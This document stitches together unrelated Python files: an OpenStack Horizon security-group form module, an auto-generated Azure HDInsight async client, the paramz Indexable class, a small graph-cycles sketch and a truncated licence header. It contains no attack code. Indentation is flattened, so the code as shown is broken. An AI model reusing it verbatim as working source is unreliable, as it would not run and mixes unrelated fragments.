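# Minimal usage sketch (illustration only, not part of the library API): on the
# docstring's example graph both entry points report the same five elementary
# circuits; only the order and starting node of each cycle may differ, so the
# cycles are normalised by sorting before printing.
if __name__ == "__main__":
    import networkx as nx  # assumed to mirror the module-level import
    G = nx.DiGraph([(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)])
    print(sorted(sorted(c) for c in simple_cycles(G)))
    print(sorted(sorted(c) for c in recursive_simple_cycles(G)))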
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core import validators
from django.forms import ValidationError # noqa
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils import validators as utils_validators
from openstack_dashboard import api
from openstack_dashboard.utils import filters
class CreateGroup(forms.SelfHandlingForm):
name = forms.CharField(label=_("Name"),
max_length=255,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"),
required=False,
widget=forms.Textarea(attrs={'rows': 4}))
def handle(self, request, data):
try:
sg = api.network.security_group_create(request,
data['name'],
data['description'])
messages.success(request,
_('Successfully created security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to create security group.'),
redirect=redirect)
class UpdateGroup(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
name = forms.CharField(label=_("Name"),
max_length=255,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"),
required=False,
widget=forms.Textarea(attrs={'rows': 4}))
def handle(self, request, data):
try:
sg = api.network.security_group_update(request,
data['id'],
data['name'],
data['description'])
messages.success(request,
_('Successfully updated security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to update security group.'),
redirect=redirect)
class AddRule(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
rule_menu = forms.ChoiceField(label=_('Rule'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'rule_menu'}))
# "direction" field is enabled only when custom mode.
# It is because most common rules in local_settings.py is meaningful
# when its direction is 'ingress'.
direction = forms.ChoiceField(
label=_('Direction'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Direction'),
'data-rule_menu-udp': _('Direction'),
'data-rule_menu-icmp': _('Direction'),
'data-rule_menu-custom': _('Direction'),
'data-rule_menu-all_tcp': _('Direction'),
'data-rule_menu-all_udp': _('Direction'),
'data-rule_menu-all_icmp': _('Direction'),
}))
ip_protocol = forms.IntegerField(
label=_('IP Protocol'), required=False,
help_text=_("Enter an integer value between 0 and 255 "
"(or -1 which means wildcard)."),
validators=[utils_validators.validate_ip_protocol],
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-custom': _('IP Protocol')}))
port_or_range = forms.ChoiceField(
label=_('Open Port'),
choices=[('port', _('Port')),
('range', _('Port Range'))],
widget=forms.Select(attrs={
'class': 'switchable switched',
'data-slug': 'range',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Open Port'),
'data-rule_menu-udp': _('Open Port')}))
port = forms.IntegerField(label=_("Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-port': _('Port')}),
validators=[
utils_validators.validate_port_range])
from_port = forms.IntegerField(label=_("From Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('From Port')}),
validators=[
utils_validators.validate_port_range])
to_port = forms.IntegerField(label=_("To Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('To Port')}),
validators=[
utils_validators.validate_port_range])
icmp_type = forms.IntegerField(label=_("Type"),
required=False,
help_text=_("Enter a value for ICMP type "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Type')}),
validators=[
utils_validators.validate_port_range])
icmp_code = forms.IntegerField(label=_("Code"),
required=False,
help_text=_("Enter a value for ICMP code "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Code')}),
validators=[
utils_validators.validate_port_range])
remote = forms.ChoiceField(label=_('Remote'),
choices=[('cidr', _('CIDR')),
('sg', _('Security Group'))],
help_text=_('To specify an allowed IP '
'range, select "CIDR". To '
'allow access from all '
'members of another security '
'group select "Security '
'Group".'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'remote'}))
cidr = forms.IPField(label=_("CIDR"),
required=False,
initial="0.0.0.0/0",
help_text=_("Classless Inter-Domain Routing "
"(e.g. 192.168.0.0/24)"),
version=forms.IPv4 | forms.IPv6,
mask=True,
widget=forms.TextInput(
attrs={'class': 'switched',
'data-switch-on': 'remote',
'data-remote-cidr': _('CIDR')}))
security_group = forms.ChoiceField(label=_('Security Group'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'remote',
'data-remote-sg': _('Security '
'Group')}))
    # When a CIDR is used, the ether type is determined from the IP version
    # of the CIDR. When a source group is used, the ether type needs to be
    # specified explicitly.
ethertype = forms.ChoiceField(label=_('Ether Type'),
required=False,
choices=[('IPv4', _('IPv4')),
('IPv6', _('IPv6'))],
widget=forms.Select(attrs={
'class': 'switched',
'data-slug': 'ethertype',
'data-switch-on': 'remote',
'data-remote-sg': _('Ether Type')}))
def __init__(self, *args, **kwargs):
sg_list = kwargs.pop('sg_list', [])
super(AddRule, self).__init__(*args, **kwargs)
# Determine if there are security groups available for the
# remote group option; add the choices and enable the option if so.
if sg_list:
security_groups_choices = sg_list
else:
security_groups_choices = [("", _("No security groups available"))]
self.fields['security_group'].choices = security_groups_choices
backend = api.network.security_group_backend(self.request)
rules_dict = getattr(settings, 'SECURITY_GROUP_RULES', [])
common_rules = [(k, rules_dict[k]['name'])
for k in rules_dict
if rules_dict[k].get('backend', backend) == backend]
common_rules.sort()
custom_rules = [('tcp', _('Custom TCP Rule')),
('udp', _('Custom UDP Rule')),
('icmp', _('Custom ICMP Rule'))]
if backend == 'neutron':
custom_rules.append(('custom', _('Other Protocol')))
self.fields['rule_menu'].choices = custom_rules + common_rules
self.rules = rules_dict
if backend == 'neutron':
self.fields['direction'].choices = [('ingress', _('Ingress')),
('egress', _('Egress'))]
else:
# direction and ethertype are not supported in Nova secgroup.
self.fields['direction'].widget = forms.HiddenInput()
self.fields['ethertype'].widget = forms.HiddenInput()
            # The ip_protocol field specifies an arbitrary protocol number
            # and is available only for neutron security groups.
self.fields['ip_protocol'].widget = forms.HiddenInput()
def clean(self):
cleaned_data = super(AddRule, self).clean()
def update_cleaned_data(key, value):
cleaned_data[key] = value
self.errors.pop(key, None)
rule_menu = cleaned_data.get('rule_menu')
port_or_range = cleaned_data.get("port_or_range")
remote = cleaned_data.get("remote")
icmp_type = cleaned_data.get("icmp_type", None)
icmp_code = cleaned_data.get("icmp_code", None)
from_port = cleaned_data.get("from_port", None)
to_port = cleaned_data.get("to_port", None)
port = cleaned_data.get("port", None)
if rule_menu == 'icmp':
update_cleaned_data('ip_protocol', rule_menu)
if icmp_type is None:
msg = _('The ICMP type is invalid.')
raise ValidationError(msg)
if icmp_code is None:
msg = _('The ICMP code is invalid.')
raise ValidationError(msg)
if icmp_type not in range(-1, 256):
                msg = _('The ICMP type is not in range (-1, 255)')
raise ValidationError(msg)
if icmp_code not in range(-1, 256):
                msg = _('The ICMP code is not in range (-1, 255)')
raise ValidationError(msg)
update_cleaned_data('from_port', icmp_type)
update_cleaned_data('to_port', icmp_code)
update_cleaned_data('port', None)
elif rule_menu == 'tcp' or rule_menu == 'udp':
update_cleaned_data('ip_protocol', rule_menu)
update_cleaned_data('icmp_code', None)
update_cleaned_data('icmp_type', None)
if port_or_range == "port":
update_cleaned_data('from_port', port)
update_cleaned_data('to_port', port)
if port is None:
msg = _('The specified port is invalid.')
raise ValidationError(msg)
else:
update_cleaned_data('port', None)
if from_port is None:
msg = _('The "from" port number is invalid.')
raise ValidationError(msg)
if to_port is None:
msg = _('The "to" port number is invalid.')
raise ValidationError(msg)
if to_port < from_port:
msg = _('The "to" port number must be greater than '
'or equal to the "from" port number.')
raise ValidationError(msg)
elif rule_menu == 'custom':
pass
else:
cleaned_data['ip_protocol'] = self.rules[rule_menu]['ip_protocol']
cleaned_data['from_port'] = int(self.rules[rule_menu]['from_port'])
cleaned_data['to_port'] = int(self.rules[rule_menu]['to_port'])
if rule_menu not in ['all_tcp', 'all_udp', 'all_icmp']:
direction = self.rules[rule_menu].get('direction')
cleaned_data['direction'] = direction
# NOTE(amotoki): There are two cases where cleaned_data['direction']
# is empty: (1) Nova Security Group is used. Since "direction" is
# HiddenInput, direction field exists but its value is ''.
        # (2) A rule template other than all_* is used. In this case, the default value
# is None. To make sure 'direction' field has 'ingress' or 'egress',
# fill this field here if it is not specified.
if not cleaned_data['direction']:
cleaned_data['direction'] = 'ingress'
if remote == "cidr":
update_cleaned_data('security_group', None)
else:
update_cleaned_data('cidr', None)
# If cleaned_data does not contain cidr, cidr is already marked
# as invalid, so skip the further validation for cidr.
        # In addition, cleaned_data['cidr'] being None means a source group is used.
if 'cidr' in cleaned_data and cleaned_data['cidr'] is not None:
cidr = cleaned_data['cidr']
if not cidr:
msg = _('CIDR must be specified.')
self._errors['cidr'] = self.error_class([msg])
else:
# If cidr is specified, ethertype is determined from IP address
# version. It is used only when Neutron is enabled.
ip_ver = netaddr.IPNetwork(cidr).version
cleaned_data['ethertype'] = 'IPv6' if ip_ver == 6 else 'IPv4'
return cleaned_data
def handle(self, request, data):
try:
rule = api.network.security_group_rule_create(
request,
filters.get_int_or_uuid(data['id']),
data['direction'],
data['ethertype'],
data['ip_protocol'],
data['from_port'],
data['to_port'],
data['cidr'],
data['security_group'])
messages.success(request,
_('Successfully added rule: %s') % unicode(rule))
return rule
except Exception:
redirect = reverse("horizon:project:access_and_security:"
"security_groups:detail", args=[data['id']])
exceptions.handle(request,
_('Unable to add rule to security group.'),
redirect=redirect)
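# Illustrative sketch only (not used by the form): the shape of a
# SECURITY_GROUP_RULES entry in local_settings.py that AddRule consumes. The
# keys match what __init__() and clean() read above; the concrete values are
# assumptions for illustration.
EXAMPLE_SECURITY_GROUP_RULES = {
    'ssh': {
        'name': 'SSH',                # shown in the rule_menu dropdown
        'ip_protocol': 'tcp',
        'from_port': '22',
        'to_port': '22',
        # Optional keys honored by this form:
        # 'backend': 'neutron',       # restrict the entry to one backend
        # 'direction': 'ingress',     # used for non-"all_*" templates
    },
}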
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ConfigurationsOperations:
"""ConfigurationsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.hdinsight.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def list(
self,
resource_group_name: str,
cluster_name: str,
**kwargs: Any
) -> "_models.ClusterConfigurations":
"""Gets all configuration information for an HDI cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ClusterConfigurations, or the result of cls(response)
:rtype: ~azure.mgmt.hdinsight.models.ClusterConfigurations
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ClusterConfigurations"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-01"
accept = "application/json"
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ClusterConfigurations', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
cluster_name: str,
configuration_name: str,
parameters: Dict[str, str],
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
'configurationName': self._serialize.url("configuration_name", configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, '{str}')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations/{configurationName}'} # type: ignore
async def begin_update(
self,
resource_group_name: str,
cluster_name: str,
configuration_name: str,
parameters: Dict[str, str],
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Configures the HTTP settings on the specified cluster. This API is deprecated, please use
UpdateGatewaySettings in cluster endpoint instead.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param configuration_name: The name of the cluster configuration.
:type configuration_name: str
:param parameters: The cluster configurations.
:type parameters: dict[str, str]
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
cluster_name=cluster_name,
configuration_name=configuration_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
'configurationName': self._serialize.url("configuration_name", configuration_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations/{configurationName}'} # type: ignore
async def get(
self,
resource_group_name: str,
cluster_name: str,
configuration_name: str,
**kwargs: Any
) -> Dict[str, str]:
"""The configuration object for the specified cluster. This API is not recommended and might be
removed in the future. Please consider using List configurations API instead.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param configuration_name: The name of the cluster configuration.
:type configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: dict mapping str to str, or the result of cls(response)
:rtype: dict[str, str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
'configurationName': self._serialize.url("configuration_name", configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('{str}', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations/{configurationName}'} # type: ignore
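# Illustrative usage sketch (not part of the generated code). It assumes the
# package-level async client, e.g. azure.mgmt.hdinsight.aio.HDInsightManagementClient,
# and azure-identity for credentials; the configuration name and update payload
# below are placeholders, not verified against a live service.
async def _example_configurations_usage(subscription_id: str,
                                        resource_group_name: str,
                                        cluster_name: str) -> None:
    from azure.identity.aio import DefaultAzureCredential
    from azure.mgmt.hdinsight.aio import HDInsightManagementClient
    async with DefaultAzureCredential() as credential:
        async with HDInsightManagementClient(credential, subscription_id) as client:
            # Fetch every configuration document for the cluster.
            configurations = await client.configurations.list(
                resource_group_name, cluster_name)
            print(configurations)
            # Start the long-running update and block until it completes.
            poller = await client.configurations.begin_update(
                resource_group_name, cluster_name,
                "gateway",                     # illustrative configuration name
                {"example.setting": "value"})  # illustrative payload
            await poller.result()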
|
|
#===============================================================================
# Copyright (c) 2015, Max Zwiessele
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of paramz.core.indexable nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
import numpy as np
from .nameable import Nameable
from .updateable import Updateable
from ..transformations import __fixed__
from operator import delitem
from functools import reduce
from collections import OrderedDict
class Indexable(Nameable, Updateable):
"""
Make an object constrainable with Priors and Transformations.
TODO: Mappings!!
    Adding a constraint to a Parameter means telling the highest parent that
    the constraint was added and making sure that all parameters covered
    by this object actually conform to the constraint.
    :func:`constrain()` and :func:`unconstrain()` are the main methods here.
"""
def __init__(self, name, default_constraint=None, *a, **kw):
super(Indexable, self).__init__(name=name, *a, **kw)
self._index_operations = OrderedDict()
def add_index_operation(self, name, operations):
if name not in self._index_operations:
self._index_operations[name] = operations
setattr(self, name, operations)
else:
raise AttributeError("An index operation with the name {} was already taken".format(name))
def remove_index_operation(self, name):
if name in self._index_operations:
delitem(self._index_operations, name)
delattr(self, name)
else:
raise AttributeError("No index operation with the name {}".format(name))
def _disconnect_parent(self, *args, **kw):
"""
From Parentable:
disconnect the parent and set the new constraints to constr
"""
for name, iop in list(self._index_operations.items()):
iopc = iop.copy()
iop.clear()
self.remove_index_operation(name)
self.add_index_operation(name, iopc)
#self.constraints.clear()
#self.constraints = constr
self._parent_ = None
self._parent_index_ = None
self._connect_fixes()
self._notify_parent_change()
#===========================================================================
# Indexable
#===========================================================================
def _offset_for(self, param):
"""
Return the offset of the param inside this parameterized object.
This does not need to account for shaped parameters, as it
basically just sums up the parameter sizes which come before param.
"""
if param.has_parent():
p = param._parent_._get_original(param)
if p in self.parameters:
return reduce(lambda a,b: a + b.size, self.parameters[:p._parent_index_], 0)
return self._offset_for(param._parent_) + param._parent_._offset_for(param)
return 0
### Global index operations (from highest_parent)
### These indices are for gradchecking, so that we
### can index the optimizer array and manipulate it directly
### The indices here do not reflect the indices in
### index_operations, as index operations handle
### the offset themselves and can be set directly
### without doing the offset.
def _raveled_index_for(self, param):
"""
        Get the raveled index for a param: an int array containing the indices
        of the flattened param inside this parameterized logic.
!Warning! be sure to call this method on the highest parent of a hierarchy,
as it uses the fixes to do its work
"""
from ..param import ParamConcatenation
if isinstance(param, ParamConcatenation):
            return np.hstack([self._raveled_index_for(p) for p in param.params])
return param._raveled_index() + self._offset_for(param)
def _raveled_index_for_transformed(self, param):
"""
get the raveled index for a param for the transformed parameter array
(optimizer array).
that is an int array, containing the indexes for the flattened
param inside this parameterized logic.
!Warning! be sure to call this method on the highest parent of a hierarchy,
as it uses the fixes to do its work. If you do not know
what you are doing, do not use this method, it will have
unexpected returns!
"""
ravi = self._raveled_index_for(param)
if self._has_fixes():
fixes = self._fixes_
### Transformed indices, handling the offsets of previous fixes
transformed = (np.r_[:self.size] - (~fixes).cumsum())
return transformed[ravi[fixes[ravi]]]
else:
return ravi
    ### These indices are just the raveled index for self.
    ### They are the ones used in the index_operations;
    ### the index_operations then handle the offsets themselves.
    ### This makes it easier to test and handle indices,
    ### as the index operations framework lives in its own
    ### corner and can be set up independently of the
    ### parameterized scope.
def _raveled_index(self):
"""
Flattened array of ints, specifying the index of this object.
This has to account for shaped parameters!
"""
return np.r_[:self.size]
######
#===========================================================================
# Tie parameters together
# TODO: create own class for tieing and remapping
#===========================================================================
# def _has_ties(self):
# if self._highest_parent_.tie.tied_param is None:
# return False
# if self.has_parent():
# return self._highest_parent_.tie.label_buf[self._highest_parent_._raveled_index_for(self)].sum()>0
# return True
#
# def tie_together(self):
# self._highest_parent_.tie.add_tied_parameter(self)
# self._highest_parent_._set_fixed(self,self._raveled_index())
# self._trigger_params_changed()
#===============================================================================
def _parent_changed(self, parent):
"""
From Parentable:
        Called when the parent changes.
        Update the constraints and priors view, so that
        constraining is automated for the parent.
"""
from .index_operations import ParameterIndexOperationsView
#if getattr(self, "_in_init_"):
#import ipdb;ipdb.set_trace()
#self.constraints.update(param.constraints, start)
#self.priors.update(param.priors, start)
offset = parent._offset_for(self)
for name, iop in list(self._index_operations.items()):
self.remove_index_operation(name)
self.add_index_operation(name, ParameterIndexOperationsView(parent._index_operations[name], offset, self.size))
self._fixes_ = None
for p in self.parameters:
p._parent_changed(parent)
def _add_to_index_operations(self, which, reconstrained, what, warning):
"""
        Helper to avoid code duplication.
        This adds the given what (transformation, prior, etc.) to the parameter
        index operations which.
        reconstrained are the indices being reconstrained.
        Warn when reconstraining parameters if warning is True.
TODO: find out which parameters have changed specifically
"""
if warning and reconstrained.size > 0:
# TODO: figure out which parameters have changed and only print those
print("WARNING: reconstraining parameters {}".format(self.hierarchy_name() or self.name))
index = self._raveled_index()
which.add(what, index)
return index
def _remove_from_index_operations(self, which, transforms):
"""
        Helper to avoid code duplication.
        Remove the given transforms (transformation, prior, etc.) from the
        parameter index operations which.
"""
if len(transforms) == 0:
transforms = which.properties()
removed = np.empty((0,), dtype=int)
for t in list(transforms):
unconstrained = which.remove(t, self._raveled_index())
removed = np.union1d(removed, unconstrained)
if t is __fixed__:
self._highest_parent_._set_unfixed(self, unconstrained)
return removed
def __setstate__(self, state):
self._index_operations = OrderedDict()
super(Indexable, self).__setstate__(state)
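# Illustrative sketch (not used by the class): the remapping performed in
# _raveled_index_for_transformed. Indices are shifted left by the number of
# fixed entries preceding them, and indices that are themselves fixed are
# dropped. The arrays below are made-up example data; np is the module-level
# numpy import.
def _example_fixed_index_remap():
    size = 6
    fixes = np.array([True, True, False, True, True, True])  # False marks a fixed entry
    ravi = np.array([1, 2, 3, 4])  # raveled indices of some parameter
    transformed = np.r_[:size] - (~fixes).cumsum()
    return transformed[ravi[fixes[ravi]]]  # -> array([1, 2, 3])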
|
|
#
# Poly2Tri
# Copyright (c) 2009, Mason Green
# http://code.google.com/p/poly2tri/
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# self list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# self list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Poly2Tri nor the names of its contributors may be
